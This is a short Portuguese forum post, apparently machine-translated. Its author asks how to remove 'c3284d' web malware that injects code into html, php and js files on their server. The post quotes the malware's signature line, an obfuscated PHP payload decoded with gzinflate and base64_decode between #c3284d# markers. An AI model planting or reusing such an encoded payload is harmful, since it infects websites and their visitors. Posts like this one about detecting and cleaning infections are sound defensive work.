Estou tendo um problema com o vírus Notorious c3284d. Ele modifica praticamente todos os arquivos html / php / js que ele pode encontrar.

Eu mudei todas as senhas e usuários no servidor, por isso, se é uma conta comprometida, deveria ter resolvido esse problema, mas ainda estou lutando para removê-lo completamente.

Consegui encontrar todos os arquivos infectados usando um simplessudo grep -R "#c3284d#" /home comando.

Mas preciso de uma maneira rápida de pesquisar esubstituir isto.

A assinatura do vírus é esta linha:

"# # C3284d" eco (gzinflate (base64_decode ( "VVHBboMwDL1X6j / kZtA6GKgMdaOVummHnfYB6xQFYkokmqSJS + nfD1hXbb7ZfvZ7fi585ZSlzXzWCcf4ka2ZNNXpgJqiyqEgfGtxzAJQtRMHhHAxn7EhuB6w4JG2RE6VJ0J4ns / 48ZPrrwC8q2DBoCGyT3HcoHBkamtajDRS3B / ayDYWwmki8nQZGtZ4RcpMa0XpTXtbeQWclaRm7CaPtv9LNgkrjZPoBlItOrUXZFx08ui2 + / EUpSX2H3UA8kHkIlmmZZ5lSZ5Kkad1nS9FIqo0S1YrCNkdS / 7parGmkfU + y1b5D / HNorNThAEUUnVMyfUOOJdOyG4HmyIeipvpxBt8j3S18 + XyLoNfNISRsBa1fG1UKwN + Hiek + Pqabw =="))); "# / c3284d #"

Quando a linha de eco pode mudar e variar, mas sempre começará com#c32..# e terminar com#/c3....#.

Eu só quero substituí-lo por nada.